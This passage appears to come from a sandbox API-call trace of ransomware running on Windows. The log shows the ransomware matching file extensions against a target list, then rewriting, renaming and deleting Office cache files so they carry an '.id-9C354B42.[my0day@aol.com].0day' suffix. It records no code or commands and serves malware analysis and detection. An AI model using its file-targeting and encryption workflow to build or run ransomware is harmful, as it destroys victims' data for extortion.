Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString=".dbf") returned 4 [0036.174] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString=".1cd") returned 4 [0036.174] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString=".jpg") returned 4 [0036.174] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString=".doc") returned 4 [0036.174] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.174] lstrlenW (lpString=".docx") returned 5 [0036.174] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.174] lstrlenW (lpString=".pdf") returned 4 [0036.174] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.174] lstrlenW (lpString=".xls") returned 4 [0036.174] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.174] lstrlenW (lpString=".xlsx") returned 5 [0036.174] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.174] lstrlenW (lpString=".ppt") returned 4 [0036.174] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString=".zip") returned 4 [0036.174] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.174] lstrlenW (lpString=".rar") returned 4 [0036.174] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.174] lstrlenW (lpString=".bz2") returned 4 [0036.174] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.174] lstrlenW (lpString=".7z") returned 3 [0036.174] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.174] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.174] lstrlenW (lpString=".dbf") returned 4 [0036.175] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.175] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.175] lstrlenW (lpString=".1cd") returned 4 [0036.175] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.175] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0036.175] lstrlenW (lpString=".jpg") returned 4 [0036.175] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.175] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0036.175] lstrlenW (lpString="OutlkLR.cab") returned 11 [0036.175] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.175] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=14819276) returned 1 [0036.175] CloseHandle (hObject=0x188) returned 1 [0036.176] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0036.176] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.176] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0036.176] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.176] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.176] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.176] ReadFile (in: hFile=0x188, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.181] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.181] ReadFile (in: hFile=0x188, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.184] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.184] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.184] ReadFile (in: hFile=0x188, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.200] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.200] WriteFile (in: hFile=0x188, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0036.214] SetEndOfFile (hFile=0x188) returned 1 [0036.214] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f1a090 [0036.218] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.218] WriteFile (in: hFile=0x188, lpBuffer=0x3f1a090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f1a090*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.219] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.219] WriteFile (in: hFile=0x188, lpBuffer=0x3f1a090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f1a090*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.220] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.220] WriteFile (in: hFile=0x188, lpBuffer=0x3f1a090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f1a090*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.221] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f1a090 | out: hHeap=0x5f0000) returned 1 [0036.221] CloseHandle (hObject=0x188) returned 1 [0038.752] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0038.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.753] lstrlenW (lpString=".doc") returned 4 [0038.753] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString=".docx") returned 5 [0038.753] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.753] lstrlenW (lpString=".pdf") returned 4 [0038.753] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString=".xls") returned 4 [0038.753] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString=".xlsx") returned 5 [0038.753] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.753] lstrlenW (lpString=".ppt") returned 4 [0038.753] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.753] lstrlenW (lpString=".zip") returned 4 [0038.753] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString=".rar") returned 4 [0038.753] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString=".bz2") returned 4 [0038.753] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.753] lstrlenW (lpString=".7z") returned 3 [0038.753] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.753] lstrlenW (lpString=".dbf") returned 4 [0038.753] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.753] lstrlenW (lpString=".1cd") returned 4 [0038.753] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.753] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.753] lstrlenW (lpString=".jpg") returned 4 [0038.753] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.754] lstrlenW (lpString=".doc") returned 4 [0038.754] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString=".docx") returned 5 [0038.754] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.754] lstrlenW (lpString=".pdf") returned 4 [0038.754] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString=".xls") returned 4 [0038.754] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString=".xlsx") returned 5 [0038.754] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.754] lstrlenW (lpString=".ppt") returned 4 [0038.754] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.754] lstrlenW (lpString=".zip") returned 4 [0038.754] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString=".rar") returned 4 [0038.754] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString=".bz2") returned 4 [0038.754] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.754] lstrlenW (lpString=".7z") returned 3 [0038.754] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.754] lstrlenW (lpString=".dbf") returned 4 [0038.754] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.754] lstrlenW (lpString=".1cd") returned 4 [0038.754] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.754] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0038.754] lstrlenW (lpString=".jpg") returned 4 [0038.754] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.755] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0038.755] lstrlenW (lpString="Proof.msi") returned 9 [0038.755] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0038.755] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=875520) returned 1 [0038.755] CloseHandle (hObject=0x188) returned 1 [0038.755] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 0x2020 [0038.755] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0038.755] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0038.755] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.755] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.755] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.012] GetLastError () returned 0x0 [0039.012] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xd5c00, lpOverlapped=0x0) returned 1 [0039.106] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xd5c10, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xd5c10, lpOverlapped=0x0) returned 1 [0039.120] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.120] WriteFile (in: hFile=0x1b0, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.120] SetEndOfFile (hFile=0x1b0) returned 1 [0039.120] CloseHandle (hObject=0x1b0) returned 1 [0039.375] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.375] SetEndOfFile (hFile=0x188) returned 1 [0039.382] CloseHandle (hObject=0x188) returned 1 [0039.382] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0039.382] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi")) returned 1 [0039.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.383] lstrlenW (lpString=".doc") returned 4 [0039.383] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.383] lstrlenW (lpString=".docx") returned 5 [0039.383] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0039.383] lstrlenW (lpString=".pdf") returned 4 [0039.383] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.383] lstrlenW (lpString=".xls") returned 4 [0039.383] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.383] lstrlenW (lpString=".xlsx") returned 5 [0039.383] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0039.383] lstrlenW (lpString=".ppt") returned 4 [0039.383] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.383] lstrlenW (lpString=".zip") returned 4 [0039.383] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.383] lstrlenW (lpString=".rar") returned 4 [0039.383] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.383] lstrlenW (lpString=".bz2") returned 4 [0039.383] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.383] lstrlenW (lpString=".7z") returned 3 [0039.383] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.383] lstrlenW (lpString=".dbf") returned 4 [0039.383] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.383] lstrlenW (lpString=".1cd") returned 4 [0039.383] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.383] lstrlenW (lpString=".jpg") returned 4 [0039.384] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.384] lstrlenW (lpString=".doc") returned 4 [0039.384] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.384] lstrlenW (lpString=".docx") returned 5 [0039.384] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0039.384] lstrlenW (lpString=".pdf") returned 4 [0039.384] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.384] lstrlenW (lpString=".xls") returned 4 [0039.384] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.384] lstrlenW (lpString=".xlsx") returned 5 [0039.384] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0039.384] lstrlenW (lpString=".ppt") returned 4 [0039.384] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.384] lstrlenW (lpString=".zip") returned 4 [0039.384] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.384] lstrlenW (lpString=".rar") returned 4 [0039.384] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.384] lstrlenW (lpString=".bz2") returned 4 [0039.384] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.384] lstrlenW (lpString=".7z") returned 3 [0039.384] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.384] lstrlenW (lpString=".dbf") returned 4 [0039.384] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.384] lstrlenW (lpString=".1cd") returned 4 [0039.384] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 81 [0039.384] lstrlenW (lpString=".jpg") returned 4 [0039.384] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.385] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0039.385] lstrlenW (lpString="Proof.msi") returned 9 [0039.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.385] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=881152) returned 1 [0039.385] CloseHandle (hObject=0x188) returned 1 [0039.385] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi")) returned 0x2020 [0039.385] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.385] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.385] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.385] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0039.571] GetLastError () returned 0x0 [0039.571] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xd7200, lpOverlapped=0x0) returned 1 [0039.724] WriteFile (in: hFile=0x1f8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xd7210, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xd7210, lpOverlapped=0x0) returned 1 [0039.741] ReadFile (in: hFile=0x188, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0039.741] WriteFile (in: hFile=0x1f8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0039.741] SetEndOfFile (hFile=0x1f8) returned 1 [0039.742] CloseHandle (hObject=0x1f8) returned 1 [0039.925] 